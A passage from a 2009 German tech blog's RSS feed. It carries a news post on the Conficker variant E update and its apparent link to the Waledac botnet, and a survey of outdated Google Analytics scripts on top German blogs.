<hr /><h2>Related posts:</h2><ul><li><a href="http://netzhappen.de/2008/12/19/bundesrat-genehmigt-bka-gesetz-mit-1-stimme-mehrheit/" rel="bookmark" title="Permanent Link: Bundesrat genehmigt BKA-Gesetz mit 1 Stimme Mehrheit">Bundesrat genehmigt BKA-Gesetz mit 1 Stimme Mehrheit</a></li><li><a href="http://netzhappen.de/2008/11/18/letzter-versuch-innenminister-wollen-bka-gesetz/" rel="bookmark" title="Permanent Link: Letzter Versuch: Innenminister wollen BKA-Gesetz">Letzter Versuch: Innenminister wollen BKA-Gesetz</a></li><li><a href="http://netzhappen.de/2008/11/16/bka-gesetz-droht-im-bundrat-zu-scheitern/" rel="bookmark" title="Permanent Link: BKA-Gesetz droht im Bundesrat zu scheitern">BKA-Gesetz droht im Bundesrat zu scheitern</a></li><li><a href="http://netzhappen.de/2008/12/17/bka-gesetz-vermittlungsausschuss-hat-sich-geeinigt/" rel="bookmark" title="Permanent Link: BKA-Gesetz: Vermittlungsausschuss hat sich geeinigt">BKA-Gesetz: Vermittlungsausschuss hat sich geeinigt</a></li><li><a href="http://netzhappen.de/2008/12/01/deutscher-fachjournalisten-verband-vs-bka-gesetz/" rel="bookmark" title="Permanent Link: Deutscher Fachjournalisten-Verband vs. BKA-Gesetz">Deutscher Fachjournalisten-Verband vs. BKA-Gesetz</a></li></ul><hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/KVb6mZfYep4wnYhO0qMFN8qQr5s/0/da"><img src="http://feedads.g.doubleclick.net/~a/KVb6mZfYep4wnYhO0qMFN8qQr5s/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/KVb6mZfYep4wnYhO0qMFN8qQr5s/1/da"><img src="http://feedads.g.doubleclick.net/~a/KVb6mZfYep4wnYhO0qMFN8qQr5s/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/gWaE44YXLYs" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/04/09/franzosisches-three-strikes-gesetz-vom-tisch/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/04/09/franzosisches-three-strikes-gesetz-vom-tisch/</feedburner:origLink></item>
		<item>
		<title>Neue Conficker-Version, P2P Download und das Waledac Botnetz</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/kRJUnJmSiJA/</link>
		<comments>http://netzhappen.de/2009/04/09/neue-conficker-version-p2p-download-und-das-waledac-botnetz/#comments</comments>
		<pubDate>Wed, 08 Apr 2009 23:09:58 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Netzsicherheit]]></category>
		<category><![CDATA[conficker]]></category>
		<category><![CDATA[p2p]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[waledac]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1482</guid>
		<description><![CDATA[Die große Aufregung um den 1. April rund um den Conficker Virus hat sich inzwischen gelegt, doch scheinbar passieren im Hintergrund weiter interessante Dinge. Die Virenspezialisten weltweit haben seit der viel zitierten Aktivierung zum Monatsanfang nichts wirklich ungewöhnliches entdeckt, bis auf das anhaltende Überprüfen von Datum und Uhrzeit durch den Virus. Allerdings beobachtete man eine [...]]]></description>
			<content:encoded><![CDATA[<p>Die große Aufregung um den 1. April rund um den <a href="http://de.wikipedia.org/wiki/Conficker">Conficker</a> Virus hat sich inzwischen gelegt, doch scheinbar passieren im Hintergrund weiter interessante Dinge. Die Virenspezialisten weltweit haben seit der viel zitierten Aktivierung zum Monatsanfang nichts wirklich ungewöhnliches entdeckt, bis auf das anhaltende Überprüfen von Datum und Uhrzeit durch den Virus. Allerdings beobachtete man eine sich verstärkende Kommunikation von Conficker über <a href="http://de.wikipedia.org/wiki/Peer-to-Peer">P2P</a> Knoten, die vor einiger Zeit in neueren Varianten von Conficker eingebaut ist.</p>
<p>Dann aber konnte letzte Nacht eine Veränderung festgestellt werden. Laut TrendMicro wurde eine neue Dateiversion auf einem befallenen Testrechner <a href="http://blog.trendmicro.com/downadconficker-watch-new-variant-in-the-mix/">entdeckt</a>. Diese neue Version wurde am 7. April um 7:41 Uhr erzeugt. Ein Vergleich mit den P2P Daten brachte die Erkenntnis das diese neue Version nicht über einen normalen HTTP Download von einem der zig von Conficker generierten Domainnamen bezogen wurde, sondern direkt von einem P2P Node aus Korea kam. Dies ist somit Variante E (laut TrendMicro) des Virus.</p>
<p>Eine Analyse dieser neuen Version zeigt einige neue Verhaltensmuster auf:</p>
<ol>
<li>Am 3. Mai 2009 wird diese Variante den Dienst beenden</li>
<li>Sie läuft unter zufälligen Dateinamen und zufälligen Dienstnamen</li>
<li>Sie wird danach die Komponente und alle anderen Spuren wie Registry-Daten löschen</li>
<li>Verteilt sich über<a href="http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx"> MS08-067</a> Bug an externe IPs, falls eine Internetverbindung vorhanden ist. sonst werden lokale IPs versucht.</li>
<li>Öffnet Port 5114 und dient als HTTP Server durch Broadcast via <a href="http://de.wikipedia.org/wiki/SSDP">SSDP</a> Anfragen</li>
<li>Verbindet sich mit den folgenden Webseiten:
<ul>
<li>Myspace.com</li>
<li>msn.com</li>
<li>ebay.com</li>
<li>cnn.com</li>
<li>aol.com</li>
</ul>
</li>
</ol>
<p>Interessant ist vor allem auch der Punkt, das der Rechner mit der E-Variante eine bekannte <a href="http://netzhappen.de/2009/03/04/waledac-botnetz-wieder-aktiver/">Waledac</a> Domain (goodnewsdigital[dot]com) ansteuerte und eine weitere verschlüsselte Datei versuchte herunterzuladen. Dies geschah zufälligerweise direkt nach dem Auftauchen der neuen Version auf dem Testrechner. Auf der entsprechenden Domain findet sich zur Zeit ein neues Waledac Binary. Ob es zwischen Conficker und dem Waledac <a href="http://de.wikipedia.org/wiki/Botnet">Botnetz</a> nun eine Verbindung gibt oder ob dies eher Zufall oder ein Täuschungsmannöver ist, ist zur Zeit noch unklar. Festzuhalten bleibt jedenfalls das Confickers P2P Kommunikationsnetz scheinbar funktionsfähig ist und aktiv genutzt wird.</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://netzhappen.de/2009/03/04/waledac-botnetz-wieder-aktiver/" rel="bookmark" title="Permanent Link: Waledac Botnetz wieder aktiver">Waledac Botnetz wieder aktiver</a></li><li><a href="http://netzhappen.de/2009/02/10/neue-tor-version-markiert-ende-der-012x-reihe/" rel="bookmark" title="Permanent Link: Neue Tor Version markiert Ende der 0.1.2.x Reihe">Neue Tor Version markiert Ende der 0.1.2.x Reihe</a></li><li><a href="http://netzhappen.de/2009/04/21/4-grunde-warum-es-immer-schwerer-wird-botnetze-zu-bekampfen/" rel="bookmark" title="Permanent Link: 4 Gründe warum es immer schwerer wird Botnetze zu bekämpfen">4 Gründe warum es immer schwerer wird Botnetze zu bekämpfen</a></li><li><a href="http://netzhappen.de/2009/02/25/conficker-befallt-deutsche-fachhochschule/" rel="bookmark" title="Permanent Link: Conficker befällt deutsche Fachhochschule">Conficker befällt deutsche Fachhochschule</a></li><li><a href="http://netzhappen.de/2009/03/07/conficker-virus-baut-abwehrmasnahmen-aus/" rel="bookmark" title="Permanent Link: Conficker Virus baut Abwehrmaßnahmen aus">Conficker Virus baut Abwehrmaßnahmen aus</a></li></ul><hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/RhwmVGT6RsJmIM2MLSwwVeV3ByM/0/da"><img src="http://feedads.g.doubleclick.net/~a/RhwmVGT6RsJmIM2MLSwwVeV3ByM/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/RhwmVGT6RsJmIM2MLSwwVeV3ByM/1/da"><img src="http://feedads.g.doubleclick.net/~a/RhwmVGT6RsJmIM2MLSwwVeV3ByM/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/kRJUnJmSiJA" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/04/09/neue-conficker-version-p2p-download-und-das-waledac-botnetz/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/04/09/neue-conficker-version-p2p-download-und-das-waledac-botnetz/</feedburner:origLink></item>
		<item>
		<title>35% der deutschen Top100 Blogs nutzen altes Google Analytics Script</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/FfxeS0sSBw0/</link>
		<comments>http://netzhappen.de/2009/04/08/35-der-deutschen-top100-blogs-nutzen-altes-google-analytics-script/#comments</comments>
		<pubDate>Wed, 08 Apr 2009 17:13:25 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Netzhappen]]></category>
		<category><![CDATA[blogcharts]]></category>
		<category><![CDATA[ga.js]]></category>
		<category><![CDATA[google analytics]]></category>
		<category><![CDATA[mint]]></category>
		<category><![CDATA[piwik]]></category>
		<category><![CDATA[statistik]]></category>
		<category><![CDATA[urchin.js]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1473</guid>
		<description><![CDATA[Inspiriert von einem Test von Royal Pingdom der Top 10.000 Seiten (nach dem Alexa-Ranking) habe ich einmal die Top100 Blogs der deutschen Blogcharts auf ihre Web Analytics Software untersucht. Dabei fiel auf das 64% Google Analytics nutzen und von diesen noch 45% eine veraltete Version. Das macht  auf die Gesamtzahl bezogen 35%.
Zwei Dinge sind [...]]]></description>
			<content:encoded><![CDATA[<p>Inspiriert von einem Test von <a href="http://royal.pingdom.com/2009/04/08/40-still-use-old-google-analytics-script/">Royal Pingdom</a> der Top 10.000 Seiten (nach dem <a href="http://alexa.com">Alexa</a>-Ranking) habe ich einmal die Top100 Blogs der <a href="http://www.deutscheblogcharts.de">deutschen Blogcharts</a> auf ihre Web Analytics Software untersucht. Dabei fiel auf das 64% <a href="http://de.wikipedia.org/wiki/Google_Analytics">Google Analytics</a> nutzen und von diesen noch 45% eine veraltete Version. Das macht  auf die Gesamtzahl bezogen 35%.</p>
<p>Zwei Dinge sind dabei interessant. Zum einen der hohe Prozentsatz an Blogs die Google Analytics einsetzen. Zum anderen der Fakt das noch immer so viele davon noch keine Aktualisierung der Tracking Software vorgenommen haben. Google hat vor mehr als einem Jahr die Entwicklung vom ursprünglich eingesetzten urchin.js Script auf das neue ga.js Script verlagert. Das in dieser langen Zeit fast die Hälfte der Blogs kein Upgrade vorgenommen hat ist schon erstaunlich.</p>
<h3>Das Problem in der Benutzung von urchin.js</h3>
<p>Der wichtigste Punkt ist hierbei das Google seit dem Wechsel zu ga.js die Betreuung von urchin.js eingestellt hat. Das heißt, dass seit der Einführung von ga.js im Dezember 2007 die Entwicklung von urchin.js stehenblieb. Als Google auf ga.js gewechselt ist, nahm man an, dass das alte Script noch etwa 12-18 Monate unterstützt wird. Das wäre bald der Fall. Laut Julien Coquet, einem Google Analytics Berater, wird urchin.js irgendwann in diesem Sommer eingemottet. Gefragt was danach passiert, meinte Coquet, dass möglicherweise ein 404 Fehler (Datei nicht gefunden) zurückgegeben wird und damit auch keine Messung des Traffics und der Besucher mehr möglich ist.</p>
<h3>Features die einem mit dem veralteten urchin.js entgehen</h3>
<p>Nach dem Wechsel von Google auf ga.js hat sich eine Menge getan und der Code wurde weiter verbessert und neue Features hinzugefügt. Mit ga.js stehen damit gegenüber folgende Verbesserungen zur Verfügung:</p>
<ul>
<li>schnellerer und kleiner Quellcode</li>
<li>automatische Erkennung von HTTPS</li>
<li>vergrößerte <a href="http://de.wikipedia.org/wiki/Namensraum">Namensraum</a>sicherheit</li>
<li>bequemere Einrichtung zum Verfolgen von E-Commerce Transaktionen</li>
<li>besser anpassbarer Code für interaktive auf ajax basierende Webseiten</li>
<li>sofortiger Zugriff auf neue Features und Berichte, wenn diese bereitgestellt werden</li>
</ul>
<h3>Andere benutze Web Analytics Software</h3>
<p>Der vollständigkeithalber habe ich noch einen sehr kurzem Blick auf einige weitere benutzte Analytics Software geworfen und herausgekommen ist folgende kleine Statistik:<br />
<strong><br />
Web Analytics Software der Top100 Blogs:</strong></p>
<ul>
<li>64 Blogs setzen Google Analytics ein</li>
<li>4 Blogs nutzen das Script von <a href="http://www.statcounter.com/">Statcounter</a></li>
<li>3 Blogs verwenden <a href="http://piwik.org/">Piwik</a></li>
<li>2 Blogs setzen auf die Dienste von <a href="http://haveamint.com/">Mint</a></li>
</ul>
<p>73 von 100 Blogs verwenden also entweder Google Analytics, Piwik, Mint oder Statcounter. Die restlichen Blogs setzen entweder keine oder andere Dienste ein, die hier allerdings nicht weiter überprüft wurden.</p>
<div id="attachment_1475" class="wp-caption aligncenter" style="width: 310px"><a href="http://netzhappen.de/wp-content/uploads/2009/04/webanalytics.jpg"><img class="size-medium wp-image-1475" title="Web Analytics software der Top100 Blogs" src="http://netzhappen.de/wp-content/uploads/2009/04/webanalytics-300x188.jpg" alt="Web Analytics software der Top100 Blogs" width="300" height="188" /></a><p class="wp-caption-text">Web Analytics software der Top100 Blogs</p></div>
<p>Insbesondere der nur kleine Anteil von Piwik hat mich erstaunt. Auf diesem Blog wird dies ebenfalls eingesetzt und verrichtet seitdem ohne Probleme seinen Dienst. Zumal Piwik eine gute Open Source Alternative zu Google Analytics ist, ständig weiterentwickelt wird und für die meisten Webseiten völlig ausreichen sollte. Auch der Datenschutzaspekt ist ein wichtiger Punkt, da Piwik im Gegensatz zu Google Analytics nicht auf einen zentralen Server setzt, sondern jeweils auf dem entsprechenden Webspace beziehungsweise Server installiert wird und damit keine Nutzerdaten quer durch das Internet rauschen.</p>
<h3>Fazit</h3>
<p>Wer unbedingt weiter auf Google Analytics setzen will, sollte einmal überprüfen ob die aktuelle Version im eigenen Blog verwendet wird, oder noch auf die inzwischen recht veraltete Version gesetzt wird. Grade im Hinblick auf neue Features und der möglichen Abschaltung von urchin.js sollte Motivation genug sein. Ansonsten vielleicht ein Anlass um aus Datenschutzgründen auf Dienste wie Piwik umzusteigen.</p>
<p><strong>UPDATE</strong><br />
Google hat inzwischen ein Statement zum Thema abgegeben:</p>
<blockquote><p>&#8220;Wir haben momentan keine Absicht urchin.js einzumotten. Aber es wird der Tag kommen an dem wir dies tun werden, aber zu diesem Zeitpunkt werden wir sicherstellen das alle Benutzer im vorhinein eine Benachrichtigung bekommen und Zeit zum wechseln haben. In der Zwischenzeit gibt es genügend gute Gründe auf ga.js zu wechseln&#8221;</p></blockquote>
<hr /><h2>Related posts:</h2><ul><li><a href="http://netzhappen.de/2009/04/20/71-der-deutschen-top100-blogs-nutzen-wordpress/" rel="bookmark" title="Permanent Link: 71% der deutschen Top100 Blogs nutzen Wordpress">71% der deutschen Top100 Blogs nutzen Wordpress</a></li><li><a href="http://netzhappen.de/2009/04/21/nur-6-der-deutschen-top100-blogs-liefern-gultiges-xhtml/" rel="bookmark" title="Permanent Link: Nur 6% der deutschen Top100 Blogs liefern gültiges (X)HTML">Nur 6% der deutschen Top100 Blogs liefern gültiges (X)HTML</a></li><li><a href="http://netzhappen.de/2009/01/19/blogsoftware-statistik-der-technorati-top100-blogs/" rel="bookmark" title="Permanent Link: Blogsoftware Statistik der Technorati Top100 Blogs">Blogsoftware Statistik der Technorati Top100 Blogs</a></li><li><a href="http://netzhappen.de/2009/02/09/google-analytics-ade/" rel="bookmark" title="Permanent Link: Google Analytics adé">Google Analytics adé</a></li><li><a href="http://netzhappen.de/2009/01/30/ladezeiten-von-google-analytics-skripten-in-der-hauptzeit-in-europa-97-langsamer/" rel="bookmark" title="Permanent Link: Ladezeiten von Google Analytics Skripten in der Hauptzeit in Europa 97% langsamer">Ladezeiten von Google Analytics Skripten in der Hauptzeit in Europa 97% langsamer</a></li></ul><hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/_rxsOVRsJMsHhxjX-Ll5ensoR60/0/da"><img src="http://feedads.g.doubleclick.net/~a/_rxsOVRsJMsHhxjX-Ll5ensoR60/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/_rxsOVRsJMsHhxjX-Ll5ensoR60/1/da"><img src="http://feedads.g.doubleclick.net/~a/_rxsOVRsJMsHhxjX-Ll5ensoR60/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/FfxeS0sSBw0" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/04/08/35-der-deutschen-top100-blogs-nutzen-altes-google-analytics-script/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/04/08/35-der-deutschen-top100-blogs-nutzen-altes-google-analytics-script/</feedburner:origLink></item>
	</channel>
</rss>
